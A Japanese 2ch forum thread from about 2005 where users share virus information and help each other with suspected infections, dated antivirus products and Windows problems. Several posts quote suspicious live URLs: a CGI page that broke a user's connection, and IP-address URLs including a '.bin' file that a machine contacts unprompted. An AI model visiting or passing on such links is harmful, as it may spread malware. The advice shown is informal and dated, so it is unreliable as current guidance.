ウィルス情報＆質問　総合スレッド☆Part30

ウィルスに関わる話題・質問はこちら。
Winny関連のウィルスは、Download板に専門スレッドがあります。

【　　最　　重　　要　　事　　項　　】
ウィスルやブラクラだと思われる物の直リンは厳禁！！！！！！！！！！
質問の時は頭の『ｈｔ』を抜いて貼り付ける事

尚、質問・回答が効率的に行えるよう、質問時には次のテンプレを使用してください。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

テンプレサイト（質問する前、書き込む前に必読）
コンピュータウィルス総合スレッド　テンプレミラーサイト（PC初心者板）
http://pcqa.tripod.co.jp/virus.htm
【警報】Winnyを狙ったワーム・ウイルス情報 テンプレまとめサイト（Download板）
http://www.geocities.jp/kemkzuenc/Antinny.html

■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです！
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう！
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■　　※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社　http://www.trendmicro.com/jp/home/personal.htm
　製品名：ウイルスバスター2005インターネットセキュリティ他
・株式会社シマンテック　http://www.symantec.com/region/jp/
　製品名：NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC （バーテックスリンクより移管）
http://www.vintage-solutions.com/Japanese/
　製品名：ANTIDOTE （アンチドート）
・株式会社アラジンジャパン　http://www.aladdin.co.jp
　製品名：eSafeProtect
・コンピュータアソシエイツ株式会社　http://www.caj.co.jp/
　製品名：InocuLAN、CheyenneAntiVirus
・マカフィー株式会社　http://www.mcafee.com/jp/default.asp
　製品名：McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
　http://www.nai.com/japan/download/dat3end.asp　（リンク切れ）
　該当する場合は諦めてノートンかウィルスバスターを買いましょう。

■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
　→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意！
　→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない！
　→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう！
　→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
　→怪しいファイルにウィルスが混入しているケースもよくあることです。
　　怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を！ ■■
　もしウィルスを発見したり、感染してしまったら届け出をしましょう！
★IPAセキュリティセンター　コンピュータウイルスに関する届出について
　http://www.ipa.go.jp/security/outline/todokede-j.html
　こちらに届け出の方法などが記載されています。
　E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。

W32.Sasser.Wormとその亜種にご注意！！
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D

Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html

「W32/Netsky」ウイルスの亜種（Netsky.Q）に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名：　以下のいずれかひとつ
　　* Mail Delivery System (＜受取人メールアドレス＞)
　　* Failure (＜受取人メールアドレス＞)
　　* Delivered Message (＜受取人メールアドレス＞)
　　* Deliver Mail (＜受取人メールアドレス＞)
　　* Delivery Error (＜受取人メールアドレス＞)
・添付ファイル名：　{ message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
　　　例： date7386.pif 、 message19392.zip など

「W32/Mydoom」（別名：Novarg）ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス（From）：　コンピュータから取得できたアドレスを詐称。
・件名：（以下の候補のいずれかを選択）
　　* Error
　　* Status
　　* Server Report
　　* Mail Transaction Failed
　　* Mail Delivery System
　　* hello
　　* hi
　　[ 任意の文字列 ]
・本文：（以下の候補のいずれかを選択）
　　"test"
　　"The message contains Unicode characters and has been sent as a binary attachment."
　　"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
　　"Mail transaction failed. Partial message is available."
　　[ 任意の文字列 ]　　[ 空白 ]
・添付ファイル名：　ランダムなアルファベット

「がいしゅつです」Q&A
Q1．ノートンを使っていたら、２ｃｈのログからウィルスを発見しました。
　　　ノートンをインストールしたら2chに書けなくなりました。
A1．ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2．ウィルスを検出しましたが、どんなウィルスかわかりません
A2．各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
　　デスクトップの背景が蓮画像になってしまいます 。
A3．Winny関連ウィルスですので、Download板へどうぞ。
　　ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/

Q4．アンチウィルスソフトを持っていないのですが、無料のものはないですか？
A4．このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part5
http://pc5.2ch.net/test/read.cgi/sec/1107065884/

Q5．ホームページが変なページになってしまいます
A5．ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイト見たら…助けて下さい！Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/

関連スレッド

Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/
sasser【スタコラサッサ】sasser　Part２
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ　part5
http://pc5.2ch.net/test/read.cgi/sec/1065964513/
【差出人】WORM_NETSKY【詐称】
http://pc5.2ch.net/test/read.cgi/sec/1080741342/
「Nimda !! 」【その４】
http://pc5.2ch.net/test/read.cgi/sec/1001864573/
エロサイト見たら…助けて下さい！Part52
http://pc5.2ch.net/test/read.cgi/pcqa/1111405528/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc5.2ch.net/test/read.cgi/sec/1091174837/
ファイアーウォールソフト 総合Part4 （DAT落ち）
http://pc5.2ch.net/test/read.cgi/sec/1074563750/
アンチウィルスソフトのウィルス誤検出
http://pc5.2ch.net/test/read.cgi/sec/1027753135/
毎日ｳｨﾙｽﾒｰﾙが送られてくるのですが･･2通目
http://pc5.2ch.net/test/read.cgi/sec/1086494732/

関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/

ググったけど、英語でよくわからない！人は

Excite エキサイト 翻訳 英語翻訳＞ウェブページ翻訳
ttp://www.excite.co.jp/world/english/web/

を使ってみよう。

PC関係の用語が分からない場合は、下記のサイトでも調べて見ましょう。
・IT用語辞典e-Words
http://e-words.jp/
・アスキーデジタル用語辞典
http://yougo.ascii24.com/

（一応）前スレ
ウィルス情報＆質問　総合スレッド☆Part29
http://pc8.2ch.net/test/read.cgi/sec/1111407467/

テンプレ終了。
貼り落とし・最新情報への更新忘れ等あった場合は随時修正願います。

Winnyを狙ったワーム・ニュイルス情報 Part36
http://tmp4.2ch.net/test/read.cgi/download/1111385299/
現在は↓

Winnyを狙ったワーム・ニュイルス情報 Part38
http://tmp5.2ch.net/test/read.cgi/download/1113652734/

>>1
乙です

【使用OS】 Windows2000
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 トレンドマイクロ オンラインスキャンのみＷ
【ちゃんとUpdateしてるか】 一ヶ月に一回位
【スキャンした結果（ウイルス名・発見場所）】 出てきません
【別のオンラインスキャンしたならその結果は】 シマンテックで試したが、こちらも出ず
【症状を具体的に、分かる限りすべて書く】
登録ユーザーが二人いました。
Aが私の使っているID,Bが家族が使っている物です。
BのIDでログインをした後、普通にログアウトした所、ログイン画面が出るまでに凄く時間が掛かりました。
再度、Bでログインした所、Documents and Settings\B(ユーザー名)の全ファイルが削除されていました。
IDは消えていませんでしたが、フォルダ構成やファイル類は新規ユーザー状態になっていました。
ちなみにAの方は何も問題がありません。
【何をしたらそんなことになったのか】
症状が出る直前のBユーザーはHotmailの確認とエクセルを開いたそうです。
それ以外の作業はしていません。
【これまでにとった措置】
とりあえずオンラインスキャン。
【その他の質問】
最初はユーザーIDの有効期限が切れたかと思ったのですが。
その場合は「管理者に問い合わせて下さい」等の文章が表示されますよね？
何かのウイルスor悪質なマクロかと思っているんですが....

使用OS】 　Windows2000
【WindowsUpdateしてるか】 　していません（容量過少のため、Update不能になりました）
【AntiVirusは何を使っているか】 ノートン使用
【ちゃんとUpdateしてるか】 していません
【スキャンした結果（ウイルス名・発見場所）】 ノートンのスキャンでは『ウィルスは見つかりませんでした』
【別のオンラインスキャンしたならその結果は】　wmplayer.exeというファイルがDownloader.Trojanに感染
トロイの木馬？
【症状を具体的に、分かる限りすべて書く】 常に何回も『wmplayer.exe』がインターネット接続を求めてくる
ノートン先生が何回も訊ねてくる『危険度高いので、遮断を推奨』といった胸のウィンドウが出て来る
【何をしたらそんなことになったのか】 したらばBBSで感染しました
【これまでにとった措置】 wmplayer.exeを削除しようとしたのですが『現在使用中』ということで
削除不能です
【その他の質問】 上記のウィルス感染したファイル、何とか削除したいのですが
無理でしょうか？

何卒宜しくお願い致します

>>13
タスクマネージャーでwmplayer.exeのプロセスを終了させてから削除はできない？

>>14
ありがとうございます。
タスクマネージャーのプロセスのタブからも
wmplayer.exeが出て来ないんです。。
直接ファイルを右クリックし、削除を試みても
『wmplayerを削除できません。アクセスできません。送り側のファイルが使用中の可能性があります。』
と出て来て手も足も出ません。。

>>15
セーフモードで起動してから削除は?

>>16=>>14でしょうか？

先ほど、ファイル削除に成功しました。

お教え頂きました通り、セーフモードで起動しようとして
再起動したのですが、失敗しました。
それから、タスクマネージャのプロセスタブをアクセスすると
wmplayerがありましたので
プロセスを終了→そのままwmplayer削除、の手順で成功しました。

ただ、どさくさに紛れていたのか
メディアプレイヤーのほうもやられていたので、これからダウンロードしなおします。

本当に、ご丁寧にお教え頂きまして、誠に有難うございました。
これからはちゃんと気をつけます。

俺はウイルスをもらったことがない。

ルーター使って、Outlook Expressを使わなきゃ、ふつう感染しないだろ？
ブラクラ踏んだり、IEのホームページを書換えられたことはあるけど。
セキュリティソフトなんて、金の無駄使いだと思うが。どうよ？

>>18
正直言ってブラクラ踏んだりIEのホームページ書き換えられる程度のヤツに
「ウィルス対策が万全ならセキュリティソフトなんて金の無駄じゃね？」
とか言われても素直に頷けないな


というかIE使ってる時点で（ｒｙ

よく見るんだ
何か垂れている
　　　　　　　　　　　　　　　　　>>18
　　　　　　　　　　　　　　　　　　|
　　 ∩＿＿＿∩　　 　　　　　 ｜
　　 | ノ,,＿ 　 ＿,ヽ　 　　　　　｜
　　/　　"ﾟ'`　{"ﾟ｀ |　　　… 　　J
　 |　∪　　,__''_　　ミ　 　　　　
　彡､　　　 ー 　　 |　　　 　　　
/　　　　 ∩ノ ⊃　 ヽ　　
(　 ＼　／ ＿ノ　|　 |
.＼　“　　／＿＿|　 |
　　＼ ／＿＿＿ ／

>>18
保険も貯蓄も健康で稼げるうちは無駄だよね。
まあそうじゃない時のために備えるのが「人間の知恵」の部分だが。

腹が減ってないから備蓄は無駄なんて言ってたら
クマさんリスさんにも笑われるよ。

板違いかもしれないですが
お勧めのセキュリティソフトってなんですか?
もともとパソにノートン入ってたんですけど
そろそろアップデートの期限が迫って
ノートンは重いって聞いてるんですけど
ちゃんとしてるやつがいいしなぁ・・・

>>22
「一番いいセキュリティソフトはなんだ!!」ってスレも機能果たしてないしな・・・。
とりあえず各ソフトのスレのログ読んだ上で絞り込んで、
見込んだソフトの体験版使ってみ。
こればっかりは自分が使いやすいと思ったものが他人にも使いやすいとは限らないし、
特定のソフトを勧めるレスはスレが荒れる元になるからあまりしたくない。

>>22
重いとかってPCの性能によって相対的なものだから。あと使い手の我慢強さとかも。
「聞いてる」っていうけど自分で耐えられないと思わないならそのまま更新しちゃえば。
大手はどこもかわらん。あ、ソースネクストは大手じゃないから。断じて。

すみません。これはウィルスかどうかは分からないのですが、
先日からパソコンがオカシイのです。ウィンドウや、ブラウザを閉じるボタンや、
チェックボックス、矢印、等が全て記号や、数字になってしまいました…
パソコン自体もおかしい気がします。ウィルスバスターってやつで検索しても
何も出てこないんですが。前もこの症状になって、ウィンドウズを入れなおした
事があります。お助けを。
使用OS：ME。UPDATEはしてます。理由不明です。

>>25
それはWindows9x系の既知のバグ。
ウィルスでも何でもない。
フォントキャッシュが壊れてるだけで、
そのキャッシュを削除すれば直る。

直し方なんかは

Windows9x(95/98)・Me質問スレッド Part47
http://pc8.2ch.net/test/read.cgi/win/1112788548/

ここいって、最初の1-10辺り読んでみ

＞２６様
大感謝です！ありがとうございます。ちょっと見て勉強してみます。
また報告します。初心者で…

>26様。
お蔭様でなおりました。すっきり。
お手数お掛けしました。
ご親切にありがとうございました。多謝

スタートアップにdaemon.exeというファイルが解凍されたようなのですが、
消そうとしてもそのexeファイルが表示されません。
どうか助言をお願いします。

>>29
daemontoolじゃないの?

>>29
まず状況を説明汁。
>>1のテンプレに従ったうえで、何故そのことに気付いたかぐらいは言わないと
藻前のPCの状況なんて誰も把握してないし。

失礼しました。
OSはxpです。
updateは2週間くらい前にしました。
ノートンを使っています。
これもupdateは2週間くらい前に。
スキャンした結果は何もありませんでした。
あるzipファイルを解凍したらスタートアップフォルダにそのexeファイルも
解凍されたようです。
ダウンロードスレをみたら同じzipファイルを解凍してそのexeファイルも解
凍されたというカキコがあったので間違いないと思います。
そのスレでは再起動するとヤバイのですぐにそのexeファイルを消せと言われ
たのですが、スタートアップフォルダにはそのexeファイルが表示されません。
プロパティをみると何かのファイルが1つあるみたいなんですが。
どうすればファイルが見えるようになるんでしょうか。
どうかお願いします。

>>32
daemon.exeでぐぐるとほとんど
デーモンツールばっかだけど

http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-w32.selotima.a.html
他に該当となるとこれか?

スタートアップをフォルダごと消して、新しく作り直しました。
解凍ソフトもLhaplusの最新版に変えました。
どうもお騒がせして申し訳ありませんでした。

>>34
それで直ったのか?
>>33のだとやばそうだが

一応ウイルスチェックしておけ

さっきこのリンクを踏んでしまったのですが
http://www.hellplant.org/cgi-bin/xoor/serpent.cgi
ネットに繋がらなくなってしまいました。
ウィンＸＰです。何か解決法等はあるのでしょうか？

最近PCにOS再インストールしたんですが、それ以来１時間半程度すると勝手にPCが落ちるようになりました。
いきなり、何の前兆もなく再起動します。
以前はそんなことまったくなかったんですが…
OSは2000NTです。Avast!の4.6を使ってるくらいしか今までと変更はないんですが…これが原因とは思いづらい…
Windouwsのアップデートは済んでいます。
ウイルススキャンは普通にとセーフモードでやりましたが検出されていません。
何か原因かわかる方いらっしゃいましたら助言頂けないでしょうか？
ちなみにMSBLASTではないようです。LSASS.EXEファイルに関するメッセージも見てません。

>>38
２０００かNTどっちだ？
SPは？
システム管理ツールのイベントビューア見て手がかりは掴めないか？

>>39
2000NTです。SPはいりません。

Windows2000 Professional
Windows2000 Server
Windows2000 Advanced Server
Windows2000 Datacenter Server

これ以外にWindows2000NTってのがあるの？　知らなかったよ

いぢわるね(´σ∀｀)つ・)))´∀｀41)

たぶん、その「NT」っていうのは「ニュータイプ」の略と見た。かっこいい。

あああすいません…使っているOSは2000Proです。
5時間飲み会して帰ってきたので頭おかしくなってました。

そして今現在も勝手にPC再起動します。条件等は不明。
最短で5分くらいで落ちます。

>>40でSPはいりません、て書いてるけど、Windows Updateしてないって事？
>>38ではしてるって書いてるから恐らくSP4なんだろうけど・・・

で、再確認
PCのパーツやOSとかの変更なし（クロックアップとかも無し）
以前のまともな時との違いはAvast!の4.6を使ってる（これは以前よりVerが違うだけか新しく使うようになったのかは知らんが）

つーか、特にウィルスくらったり変なアプリをインスコした憶えがないならメモリとかパーツの問題のような気がする

>>44
いや、「SPはいりません」じゃなくてね。
サービスパックは何を適用してるの？

5時間飲んでて頭おかしくなってただぁ？
(´･ω･｀)知らんがな

メーラのBecky!で今日受信した添付ファイルの中にウィルスが入っていると
ウィルスバスターオンラインで判定されたんですが、
該当のメールを丸ごとゴミ箱から削除しても残っていると判定されてしまいます。
どうも20050503.bkl というファイルにバイナリレベルで文字列が書き込まれているようなのですが、
これをテキストエディタで開いて編集するのはマズいでしょうか？

もしくは削除したいのですが、右クリックしただけで感染、ということはあり得ますか？

>>48
それはむしろBecky!固有というかBecky!依存で発生する問題。
ファイル名見ただけで受信メールのバックアップログってことは想像がつくが、
ユーザー有志のFAQの類をまず調べた方が早かったな。
http://www.rimarts.com/bbs_b2/cyclamen.cgi?ol=200205&tree=r11860#11860

>>49
すみません。誘導ありがとう

海外からスパムメールが最近来るようになったのですが、その中に私の実名がタイトルに載ってるやつがきました。

差出人のアドレスがhideakifan.comとなっていたので、ググってみたところ、

ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.spbot.b.html

というウイルス情報を発見しました。

私の実名を知る誰かのPCにこのウイルスが感染しているということでしょうか？

このメールアドレスで実名を使うのはネット通販ぐらいなものなので、ちょっと不気味です。

放置して置いてもよいものでしょうか？

前スレもう落ちたのか

ttp://66.98.144.29/avir.cn.bin
ttp://69.57.136.113/post2.php

↑の２つのURLに勝手にアクセスしちゃうんですが、これが何か分かる方いますか？
ログを見ると、ほぼ同時にアクセスしているから無関係ではないと思うんだけど・・・

>>53
とりあえず、スキャンしてみたらどうよ?

>>45

SPは１…かな？IEのバーション情報では１になってます。
重要な更新はすでになく、入れられるものはみんないれてあります。

ちなみに…40は私じゃありません。別人です。

PCのパーツ及びOSは以前と変更はありません。クロックアップもしてません。
以前のまともな頃はAvast!を使ってませんでした。けど切っても落ちるようです。
で、セーフモードだと何時間たっても落ちませんでした。
何がいけないのかさっぱりです。

げげ、間違えてあげてしまった…失礼しました。
あとサービスパックに関することは>>４６さんのほうの答えです。

>>56
IEのSPと2000のSPは違うよ。
マイコンピュータのプロパティで見られる方。

それから、イベントビューアの方も調べてみること。
起動時や終了時になんかイベント吐いてるかも知れないし。

>>57

訂正ありがとうございます、SPは４でした。
無知ですいません。

イベントビューアも見てきましたが、特に起動時にも終了時にもおかしなログはなかったです。
昼にネットつないでるUSBケーブル前と場所かえたので元に戻しましたが…
これで直るわけないとおもうけど、現在1時間半以上落ちてない。
まさかこんな原因なのだろうか…？

>>58
それは有り得る。
トラブルの原因なんてどうしようもなく些細なことだったりするからな…

ノートパソコンを使ってるのですが、最近排熱ファンが稼動しなくなりました。
排熱ファンの稼動を止めてしまうようなウイルスやデバイス改ざんソフトはありますか？

「オッカムの剃刀」って言葉があるそうだ。
「ある事柄を説明するのに、必要以上の仮説を立ててはならない」 
「現象を同程度うまく説明する仮説があるなら、よりシンプルな方を選ぶべきである」
って意味だそうだ。

以前、「PCの電源がはいらない！」って言われたことがある。
俺が一番最初に確認すべきだと思ったことは「コンセント抜けてない？」

マイドキュメント内にある、Fgwってフォルダは何ですか？
いったん消したのですが、復活しました。
フォルダ内にはdatebaseとかU backgrとか５つあって
いずれも、なヵにはGroup000というフォルダがあり、
さらに、その中には、エクセルCSVファイルってのが
あります。
Ad-Aware,AVG free editionを使ってますが、反応はありませんが、
心配なので書き込みさせていただきました。

>>62
筆ぐるめを使ってるのでは？

>>60
ホコリつもってまわらなくなっちゃったとかってオチじゃないだろうな。

>>63
なるほど・・・
パソコンは父親もつかってるので、筆ぐるめなのでしょう。
心配でシマンテックでウィルススキャンしたら、Fgwは問題なしでした。

が、
C:\Program Files\ShopperReports\Bin\1.0.4.0\ShprRprt.dll は
　Adware.Hotbar に感染しています。
C:\Program Files\gikoNavi\Log\2ch\news\1104371687.dat は
　Unix.Penguin に感染しています。
C:\Program Files\gikoNavi\Log\2ch\liveanb\1110283752.dat は
　Unix.Penguin に感染しています。
となったので、今から駆除しないといけません・・・・

>>65
ギコナビのログは関係ないのでは？
誤検出っぽい。

>>65
＞C:\Program Files\ShopperReports\Bin\1.0.4.0\ShprRprt.dll は
＞Adware.Hotbar に感染しています。

これだけ駆除すれ

65です。
よくわかってないのですが、Adwareってスパイウェア対策のソフト
なのに、コレ自体がウィルスなんですか？
削除方法をさがしているのですが、もしお分かりでしたら
ご指導おねがいします。

拡張子を表示するようにしたらフォルダを開く前に危険を察知できたりするんですか？

>>68
AdwareとAd-awareは違う

スパイウェア削除ソフトAd-awareSE　その21
http://pc8.2ch.net/test/read.cgi/sec/1114957620/

Adware.Hotbar駆除方法
http://www.symantec.com/region/jp/avcenter/venc/data/adware.hotbar.html

>>69
フォルダなのか、フォルダに偽装した実行ファイルか
判別しやすくなるため、危険度が低くなる。

>>71
ありがとうございます。
ｚｉｐファイルの詳細設定を常に拡張子を表示するにチェックを入れましたが
何も変わった様子がありません。他に何か設定することがあるんでしょうか？

>>72
zipだけじゃなくて、すべて表示させるようにする。

エクスプローラの設定
「ツール」−「フォルダオプション」ー「表示」で「登録されている
ファイルの拡張子は表示しない」のチェックを外すでOK。

>>70
プログラムの追加と削除でShopperReportsを削除しました。
ツールバー？に変なボタンあると思ってたらコレだったんですね。
ぜんぜん気づかなかった・・・
このたびは,ありがとうございました。

>>73
早速のレスありがとうございます。
それだけでよかったんですね。では今まで勝手にいじってしまった分もあるので
全フォルダをリセットしてから行った方がいいんでしょうか？

ここにはひっかかってる香具師はいないと思うが、念のため・・・

運営の山田ウィルス報告＆対策スレ
http://qb5.2ch.net/test/read.cgi/operate/1114695735/l50

すみません、Windows、XPがウイルスにやられて電源入れても初めの画面だけ出てあとは真っ暗になるんですがこの症状が出たらもう完全に無理ですか？
それとも電気屋に持っていったら何とかなりますか？
とんでもなく無知ですみません。どなたかお願いします。

>>77
まずはセーフモードで起動してみましょう

>>64
60だけど、そういうオチはない。
こちらの事例はともかく、
今までに排熱ファンの稼動を止めてしまうようなウイルスやデバイス改ざんソフトの話題が出たことある？

>>79
さっさと修理に出せ。

　　　　　　　　 {!!!!`'ヽ、
　　　　　　　 　 ~‐-,,�＝R
　　　　　　　　　 ＿人　｀j
　　　　　　　 i ⌒ 　　 ノ
　　　　 ∧∧ｲ 　　　 ,;´
　　　　（ ´_ゝ） 　　 く
　_　 　 j　　　　　 ノ ）
ｊｊｊｊ｣　 f¨　　　 　　!_ ~￣￣￣~ーy,,　　 ＿＿,;-ー､
i　;~　 j　　 ⌒ヽ´ 　 ~　ー ､　　　 ￣~~ 　　　　 　 `'ヽ
'!,　`ーI　　;＿ ミ　　　　￣~--､ 　　　 ,,-ー"ー ､--'~　　　.'　　，　．. .∧＿∧
　|　　　｀ ﾉ 　"''ー-人　　　　　~ーヽ_;-ー"¨“''-'´　 `ｰ;､　 .∴　'　　　（　>>80）
　 ~- - ~ 　　　　 ￣''ー-,,__　　　　　　＿;-ー-;,_､ 　　j　・,‘　ｒ⌒>　 _／ ／
　　　　　　　　　　　　　　　 ￣''￣''--'´　　　　 　 "`'´　. 　’ |　ｙ'⌒　　⌒i
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　|　　／　　ノ ｜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ー' 　／´ヾ_ﾉ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　／　,　　ノ
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ／　／ ／
　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　 ／　／　,'
　　　　　　　　　　　　　　　　　　　　　　　　　 　　　／　 ／| 　|
　　　　　　　　　　　　　　　　　　　　　　　　　　　　!､＿／ / 　 〉
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　|_／

まあまじめな話、>>80が正解だと思うな。

>>78
>>77です。セーフモードでも同じく真っ暗なんです…。
もうだめなんですかね？orz

>>83
どうして「ウイルスにやられた」と思ったの？
まぁ、PCショップに修復依頼するのも良いとは思うけど、
修理費用の確認を忘れずに・・・。

Meで
BITDefender使ってるんですが、

C:\_RESTORE\TEMP　に
Win32.HLLW.Antinny.A

というウィルスが、何時の間にやら入り込んでいて困ってます。
どーにも、駆除できないようでして、お知恵をお借り致したく存じます。

>>85
>>1

>85
「何時の間に」は、入ってこないと思う。

ああ、そうか。　ぬ○ぽのカスなんですね・・・。　orz　ﾔﾛｳ､ｺﾉｳﾗﾐﾊﾗｻﾃﾞｵｸﾍﾞｷｶ
実害はないんですけど、気持ち悪いんでdownload板逝ってきまつ･･･　　　｜　　　λ...
お邪魔いたしました。

（´-`）.｡oO（まあ違法ﾀﾞｳｿした挙句Antinnyなんか掛かったおまいがカスなんだがな）

ついさっき親が知人に電話で相談を受けた内容を又聞きしただけなので
情報の絶対量が少なく恐縮なのですが
少し特徴的なものだったのでお尋ねさせていただきます。

インターネットを閲覧中に
"矢印"　と　"ドーナツのようなマーク"　が表示されて
その後　"電源が落ち"　"何度起動しようとしても起動しない"　
という症状が出ているとのことなのですが。

これだけで候補にあがるウィルスはあるでしょうか。

一応矢印や◎のキーワードでぐぐって見たのですがそれらしき記述も見つからず
もし心当たりがあれば教えていただけると幸いです。

知人のPCを買った時期から言って
恐らくXP、Updateは流石にわかりませんが、IEを使用していると思います。

自己解決したらしいです、なにやったのか要領を得ない報告でしたが…。

スレ汚しｽﾏｿ。

すいません。他の人は見れる掲示板(サイト）が自分だけ見れないのは
何が原因でしょうか？拒否などのメッセージはなくよくある
エラーなんですが。
同系のサイトは開けず。
掲示板は2chと似ている感じでトップ10は普通に見れるんですが
個別にスレを開くとやはりサイトと同じようにエラーで開けません。
ウィルスが原因でこうなることはあるんでしょうか？

メールは受信する前にtyo_mailでチェックして、
スパムを削除してから受信してます。

今日届いたスパム、いつものようにメールサーバーで削除し終わっても
その直後に受信、削除してもまた受信…その繰り返しです。
もう10回以上繰り返しましたが、永遠に湧いてくるみたいです。
気持ち悪いです。

しつこいから受信してみたら、ウィルスでした。
ノートンで感染はしなかったのですが、
いいかげん削除したいです。
どうすればいいでしょう？

ちなみにタイトルが
　Your email was blocked
送信者が
　[email protected]
添付が
　error-mail_info.zip

【使用OS】 XP 【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 最低でも1週間に1度
【スキャンした結果（ウイルス名・発見場所）】
ノートンには引っかからなかった。ファイルの場所は不明。
CoolWebSearch。発見場所→IEのHP
